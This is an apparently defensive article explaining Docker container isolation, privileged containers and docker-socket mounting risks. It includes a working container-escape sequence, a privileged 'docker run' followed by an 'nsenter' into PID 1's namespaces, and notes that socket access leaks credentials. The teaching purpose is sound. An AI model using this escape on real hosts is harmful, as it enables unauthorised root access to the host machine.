Breaking out of docker containers

Containers have replaced virtual machines for many workloads, providing a light but still isolated execution environment for deployments from development to production. But while these technologies look and feel similar in many regards, they are very different under the hood.

Containers aren't virtual machines

Before containers became popular, virtual machines were used for many tasks now taken over by docker. In many cases, containers are effectively a lightweight replacement for virtual machines, with faster starting times, less overhead and easier management. But while these technologies look and feel similar to an operator, they are very different internally: Virtual machines virtualize an entire operating system, complete with hardware and separate kernel, while containers share the host kernel and only apply some isolation mechanisms, like confining it to a separate process and network namespace. Containers cannot see processes/networking or devices outside of their namespace, boxing them into their own little virtual environment.

But sharing a kernel with the host obviously comes with some hefty drawbacks. To ensure containers cannot easily use kernel calls to escape their environment, a default seccomp profile filters out potentially dangerous kernel access, while apparmor/selinux prevent direct access to risky filesystem paths like /dev, /proc and /sys.

But if the host kernel is exploitable, then a compromised container quickly leads to a compromised host machine. No level of protections can guarantee safety against exploits of this nature, if they happen to be possible without making restricted kernel calls. Some risk remains, even in a perfectly configured environment.

Privileged containers aren't what you think

Docker containers are restricting the use of some features that could be dangerous to the host or compromise the isolation of the container. This default behavior can be adjusted as necessary, by giving the container special "linux capabilities", for example CAP_SYS_MODULE to allow loading kernel modules or CAP_SYS_ADMIN for administrative tasks like mounting filesystems, setting disk quotas or setting up loop devices (run man 7 capabilities for a list of all possible options).

A container can be given these capabilities with the --cap-add= flag

docker run --rm -it --cap-add=CAP_SYS_ADMIN debian bash

Many users now assume that running a privileged container with the --privileged flag is like giving it all the capabilities, but there is a different flag to do this: --cap-add=ALL. So what is a privileged container then? It is a container that has all capabilities, but also disables seccomp and apparmor/selinux protections and mounts the host's /dev directory into the container. In reality, this means the container has no meaningful security mechanism isolating it from the host anymore. It can access every host drive by mounting it from /dev, so it can read and write to the host filesystem at will. Removing the seccomp and apparmor protections also means that a process within the container can easily switch out of the container's namespace into the host one, and effectively run any program they like on the host machine:

Start an interactive container:

docker run --rm -it --privileged debian bash

Then simply switch to the host's namespace:

nsenter --target 1 --mount --uts --ipc --net --pid

An just like that, you can now freely start processes on the host system outside of the container. Privileged containers throw away all forms of protection that containers provided in the first place. They are like running the contents directly on the host system as root.

Mounting the docker socket into containers

Some applications have started offering native integrations for the docker socket to automate workflows. The traefik reverse proxy for example can watch the docker socket for new containers, and automaticelly set up reverse proxy configurations based on container labels. This drastically simplifies the workflow for hosting containers at scale, but also means that the traefik process needs access to the docker socket.

Most deployments would run traefik in a container just like the other applications, but giving it access to the docker socket effectively removes the security benefits of containers entirely. If the application had a vulnerability, then an attacker could easily use the mounted docker socket to spawn a privileged container and escape through that onto the host system.

Mounting the docker socket is always risky, and provides potentially complete access to the host machine. You can reduce this risk to some degree by mounting it read-only (add :ro to the end of the mount), so at least the container cannot talk to the daemon directly (run/change containers). But even then, just reading provides a LOT of information: Containerized applications requiring credentials (admin dashboards, databases, fileservers, ...) typically receive those through environment variables. Read permission on the docker socket is all an attacker needs to read those, and escalate their access to other containers that way.

Does that make containers bad?

No. Containers are a great way for most deployments to strike a balance between performance and isolation, and can be safely used in production environments. That being said, they aren't perfect. Sharing a kernel with the host machine leaves some attack surface, and privileged containers or bind-mounting privileged resources can quickly undo their isolation.

Containers aren't intended or suitable for bulletproof isolation, that's still the job of virtual machines. Some newer technologies have emerged to fill that gap, like Kata Containers or the movement towards rootless containers in docker/podman. But being aware of how the security and isolation mechanisms of containers work is still necessary to understand the risk you are exposing your machines to through running containers.